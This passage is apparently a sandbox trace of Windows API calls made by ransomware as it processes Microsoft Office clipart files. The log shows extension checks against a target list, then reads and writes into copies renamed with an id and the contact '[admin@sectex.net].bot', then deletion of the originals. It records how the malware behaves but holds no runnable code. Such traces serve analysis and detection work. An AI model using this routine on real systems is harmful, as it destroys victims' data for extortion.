	[0058.894] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0058.895] lstrlenW (lpString=".bz2") returned 4
	[0058.895] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0058.895] lstrlenW (lpString=".7z") returned 3
	[0058.895] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0058.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63
	[0058.895] lstrlenW (lpString=".dbf") returned 4
	[0058.895] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0058.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63
	[0058.895] lstrlenW (lpString=".1cd") returned 4
	[0058.895] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0058.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63
	[0058.895] lstrlenW (lpString=".jpg") returned 4
	[0058.895] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0058.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63
	[0058.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63
	[0058.895] lstrlenW (lpString=".doc") returned 4
	[0058.895] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0058.895] lstrlenW (lpString=".docx") returned 5
	[0058.895] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0058.895] lstrlenW (lpString=".pdf") returned 4
	[0058.895] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0058.895] lstrlenW (lpString=".xls") returned 4
	[0058.895] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0058.895] lstrlenW (lpString=".xlsx") returned 5
	[0058.895] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0058.895] lstrlenW (lpString=".ppt") returned 4
	[0058.895] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0058.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63
	[0058.895] lstrlenW (lpString=".zip") returned 4
	[0058.895] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0058.895] lstrlenW (lpString=".rar") returned 4
	[0058.895] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0058.895] lstrlenW (lpString=".bz2") returned 4
	[0058.895] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0058.895] lstrlenW (lpString=".7z") returned 3
	[0058.896] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0058.896] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63
	[0058.896] lstrlenW (lpString=".dbf") returned 4
	[0058.896] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0058.896] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63
	[0058.896] lstrlenW (lpString=".1cd") returned 4
	[0058.896] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0058.896] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63
	[0058.896] lstrlenW (lpString=".jpg") returned 4
	[0058.896] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0058.896] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0058.896] lstrlenW (lpString="AN01545_.WMF") returned 12
	[0058.896] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01545_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0058.896] GetFileSizeEx (in: hFile=0x184, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=7372) returned 1
	[0058.896] CloseHandle (hObject=0x184) returned 1
	[0058.896] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01545_.wmf")) returned 0x20
	[0058.896] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01545_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0058.896] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01545_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0058.897] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.897] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.897] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01545_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204
	[0058.897] GetLastError () returned 0x0
	[0058.897] ReadFile (in: hFile=0x184, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x1ccc, lpOverlapped=0x0) returned 1
	[0058.898] WriteFile (in: hFile=0x204, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x1cd0, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x1cd0, lpOverlapped=0x0) returned 1
	[0058.899] ReadFile (in: hFile=0x184, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0058.899] WriteFile (in: hFile=0x204, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0058.899] SetEndOfFile (hFile=0x204) returned 1
	[0058.900] CloseHandle (hObject=0x204) returned 1
	[0058.900] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.900] SetEndOfFile (hFile=0x184) returned 1
	[0058.900] CloseHandle (hObject=0x184) returned 1
	[0058.901] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0058.901] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01545_.wmf")) returned 1
	[0058.901] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63
	[0058.901] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63
	[0058.901] lstrlenW (lpString=".doc") returned 4
	[0058.901] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0058.901] lstrlenW (lpString=".docx") returned 5
	[0058.901] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0058.901] lstrlenW (lpString=".pdf") returned 4
	[0058.901] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0058.901] lstrlenW (lpString=".xls") returned 4
	[0058.901] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0058.901] lstrlenW (lpString=".xlsx") returned 5
	[0058.901] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0058.901] lstrlenW (lpString=".ppt") returned 4
	[0058.901] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0058.901] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63
	[0058.901] lstrlenW (lpString=".zip") returned 4
	[0058.901] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0058.901] lstrlenW (lpString=".rar") returned 4
	[0058.901] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0058.901] lstrlenW (lpString=".bz2") returned 4
	[0058.901] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0058.901] lstrlenW (lpString=".7z") returned 3
	[0058.902] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0058.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63
	[0058.902] lstrlenW (lpString=".dbf") returned 4
	[0058.902] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0058.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63
	[0058.902] lstrlenW (lpString=".1cd") returned 4
	[0058.902] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0058.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63
	[0058.902] lstrlenW (lpString=".jpg") returned 4
	[0058.902] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0058.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63
	[0058.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63
	[0058.902] lstrlenW (lpString=".doc") returned 4
	[0058.902] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0058.902] lstrlenW (lpString=".docx") returned 5
	[0058.902] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0058.902] lstrlenW (lpString=".pdf") returned 4
	[0058.902] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0058.902] lstrlenW (lpString=".xls") returned 4
	[0058.902] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0058.902] lstrlenW (lpString=".xlsx") returned 5
	[0058.902] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0058.902] lstrlenW (lpString=".ppt") returned 4
	[0058.902] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0058.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63
	[0058.902] lstrlenW (lpString=".zip") returned 4
	[0058.902] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0058.902] lstrlenW (lpString=".rar") returned 4
	[0058.902] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0058.902] lstrlenW (lpString=".bz2") returned 4
	[0058.902] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0058.902] lstrlenW (lpString=".7z") returned 3
	[0058.902] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0058.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63
	[0058.902] lstrlenW (lpString=".dbf") returned 4
	[0058.903] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0058.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63
	[0058.903] lstrlenW (lpString=".1cd") returned 4
	[0058.903] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0058.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63
	[0058.903] lstrlenW (lpString=".jpg") returned 4
	[0058.903] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0058.903] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0058.903] lstrlenW (lpString="AN02122_.WMF") returned 12
	[0058.903] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02122_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0058.905] GetFileSizeEx (in: hFile=0x184, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=7540) returned 1
	[0058.905] CloseHandle (hObject=0x184) returned 1
	[0058.905] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02122_.wmf")) returned 0x20
	[0058.905] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02122_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0058.905] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02122_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0058.905] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.905] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.905] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02122_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204
	[0058.906] GetLastError () returned 0x0
	[0058.906] ReadFile (in: hFile=0x184, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x1d74, lpOverlapped=0x0) returned 1
	[0058.907] WriteFile (in: hFile=0x204, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x1d80, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x1d80, lpOverlapped=0x0) returned 1
	[0058.908] ReadFile (in: hFile=0x184, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0058.908] WriteFile (in: hFile=0x204, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0058.908] SetEndOfFile (hFile=0x204) returned 1
	[0058.908] CloseHandle (hObject=0x204) returned 1
	[0058.908] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.908] SetEndOfFile (hFile=0x184) returned 1
	[0058.909] CloseHandle (hObject=0x184) returned 1
	[0058.909] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0058.909] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02122_.wmf")) returned 1
	[0058.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63
	[0058.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63
	[0058.910] lstrlenW (lpString=".doc") returned 4
	[0058.910] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0058.910] lstrlenW (lpString=".docx") returned 5
	[0058.910] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0058.910] lstrlenW (lpString=".pdf") returned 4
	[0058.910] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0058.910] lstrlenW (lpString=".xls") returned 4
	[0058.910] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0058.910] lstrlenW (lpString=".xlsx") returned 5
	[0058.910] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0058.910] lstrlenW (lpString=".ppt") returned 4
	[0058.910] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0058.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63
	[0058.910] lstrlenW (lpString=".zip") returned 4
	[0058.910] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0058.910] lstrlenW (lpString=".rar") returned 4
	[0058.910] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0058.910] lstrlenW (lpString=".bz2") returned 4
	[0058.910] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0058.910] lstrlenW (lpString=".7z") returned 3
	[0058.910] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0058.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63
	[0058.910] lstrlenW (lpString=".dbf") returned 4
	[0058.910] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0058.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63
	[0058.910] lstrlenW (lpString=".1cd") returned 4
	[0058.910] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0058.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63
	[0058.910] lstrlenW (lpString=".jpg") returned 4
	[0058.910] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0058.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63
	[0058.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63
	[0058.911] lstrlenW (lpString=".doc") returned 4
	[0058.911] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0058.911] lstrlenW (lpString=".docx") returned 5
	[0058.911] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0058.911] lstrlenW (lpString=".pdf") returned 4
	[0058.911] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0058.911] lstrlenW (lpString=".xls") returned 4
	[0058.911] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0058.911] lstrlenW (lpString=".xlsx") returned 5
	[0058.911] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0058.911] lstrlenW (lpString=".ppt") returned 4
	[0058.911] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0058.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63
	[0058.911] lstrlenW (lpString=".zip") returned 4
	[0058.911] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0058.911] lstrlenW (lpString=".rar") returned 4
	[0058.911] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0058.911] lstrlenW (lpString=".bz2") returned 4
	[0058.911] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0058.911] lstrlenW (lpString=".7z") returned 3
	[0058.911] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0058.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63
	[0058.911] lstrlenW (lpString=".dbf") returned 4
	[0058.911] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0058.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63
	[0058.911] lstrlenW (lpString=".1cd") returned 4
	[0058.911] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0058.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63
	[0058.911] lstrlenW (lpString=".jpg") returned 4
	[0058.911] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0058.912] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0058.912] lstrlenW (lpString="AN02559_.WMF") returned 12
	[0058.912] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02559_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0058.912] GetFileSizeEx (in: hFile=0x184, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=6632) returned 1
	[0058.912] CloseHandle (hObject=0x184) returned 1
	[0059.029] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02559_.wmf")) returned 0x20
	[0059.029] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02559_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0059.077] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02559_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230
	[0059.077] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.077] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.077] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02559_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228
	[0059.077] GetLastError () returned 0x0
	[0059.077] ReadFile (in: hFile=0x230, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x19e8, lpOverlapped=0x0) returned 1
	[0059.079] WriteFile (in: hFile=0x228, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x19f0, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x19f0, lpOverlapped=0x0) returned 1
	[0059.080] ReadFile (in: hFile=0x230, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0059.080] WriteFile (in: hFile=0x228, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0059.080] SetEndOfFile (hFile=0x228) returned 1
	[0059.080] CloseHandle (hObject=0x228) returned 1
	[0059.080] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.080] SetEndOfFile (hFile=0x230) returned 1
	[0059.081] CloseHandle (hObject=0x230) returned 1
	[0059.081] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0059.081] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02559_.wmf")) returned 1
	[0059.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63
	[0059.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63
	[0059.081] lstrlenW (lpString=".doc") returned 4
	[0059.081] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0059.082] lstrlenW (lpString=".docx") returned 5
	[0059.082] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0059.082] lstrlenW (lpString=".pdf") returned 4
	[0059.082] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0059.082] lstrlenW (lpString=".xls") returned 4
	[0059.082] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0059.082] lstrlenW (lpString=".xlsx") returned 5
	[0059.082] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0059.082] lstrlenW (lpString=".ppt") returned 4
	[0059.082] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0059.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63
	[0059.082] lstrlenW (lpString=".zip") returned 4
	[0059.082] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0059.082] lstrlenW (lpString=".rar") returned 4
	[0059.082] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0059.082] lstrlenW (lpString=".bz2") returned 4
	[0059.082] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0059.082] lstrlenW (lpString=".7z") returned 3
	[0059.082] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0059.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63
